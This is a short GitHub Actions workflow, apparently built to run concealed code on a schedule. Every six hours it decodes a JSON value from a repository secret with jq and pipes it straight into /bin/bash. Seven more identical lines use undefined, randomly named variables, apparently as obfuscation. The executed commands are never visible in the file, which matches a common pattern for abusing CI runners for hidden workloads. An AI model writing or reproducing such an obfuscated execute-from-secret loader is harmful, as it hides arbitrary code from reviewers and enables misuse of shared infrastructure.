name: fishfastz
on:
  workflow_dispatch:
  schedule:
    - cron: '14 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fishfastz
        env:
          etami594: ${{ secrets.etami594 }}
        run: |
          echo $etami594 | jq -r .fb4 | /bin/bash
          echo $fpd3460 | jq -r .rqjul67 | /bin/bash
          echo $eup52 | jq -r .fl726 | /bin/bash
          echo $v75 | jq -r .wq17295 | /bin/bash
          echo $pbb104 | jq -r .y25286 | /bin/bash
          echo $eyxk1 | jq -r .telz5444 | /bin/bash
          echo $jstx06834 | jq -r .nza7709 | /bin/bash
          echo $o394 | jq -r .szw350 | /bin/bash

